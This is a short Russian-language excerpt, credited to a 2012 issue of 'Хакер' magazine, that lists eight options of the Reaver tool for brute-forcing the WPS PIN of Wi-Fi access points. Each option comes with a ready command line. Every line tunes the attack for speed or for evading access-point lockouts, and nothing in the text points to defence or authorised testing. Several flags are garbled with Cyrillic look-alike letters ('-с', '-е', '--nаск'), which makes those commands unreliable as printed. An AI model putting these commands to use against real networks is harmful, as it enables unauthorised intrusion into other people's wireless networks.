Дополнительные опции, Reaver, которые могут повысить скорость и эффективность перебора ключа WPS.
1. Можно задать номер канала и SSID точки доступа:
# reaver -i mon0 -b 00:01:02:03:04:05 -с 11 -е linksys
2. Благотворно сказывается на скорости брутфорса опция '--dh-small',которая задает небольшое значение секретного ключа, тем самым облегчая расчеты на стороне точки доступа:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
3. Таймаут ожидания ответа по умолчанию равен пяти секундам. При необходимости его можно изменить:
# reaver -i mon0 -b 80:01:02:03:04:05 -t 2
4. Задержка между попытками по умолчанию равна одной секунде. Она также может быть настроена:
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0
5. Некоторые точки доступа могут блокировать WPS на определенное время, заподозрив, что их пытаются поиметь. Reaver эту ситуацию и делает паузу в переборе на 315 секунд по умолчанию, длительность этой паузы можно менять:
# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
6. Некоторые реализации протокола WPS разрывают соединение принеправильном PIN-коде, хотя по спецификации должны возвращать особое сообщение. Reaver автоматически распознает такую ситуацию, для этого существует опция '--nаск':
# reaver -i mon0 -b 00:01:02:03:04:05 --nack
7. Опция '--eap-terminate' предназначена для работы с теми АР, которые
требуют завершения WPS-сессии с помощью сообщения ЕАР FAIL:
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
8. Возникновение ошибок в WPS-сессии может означать, что АР
ограничивает число попыток ввода PIN-кода, либо просто перегружена запросами. В этом случае Reaver приостанавливает свою деятельность, причем время паузы может быть задано с помощью опции '--fail-wait':
# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360
(Взято с журнала "Хакер" №3 от 2012 г.)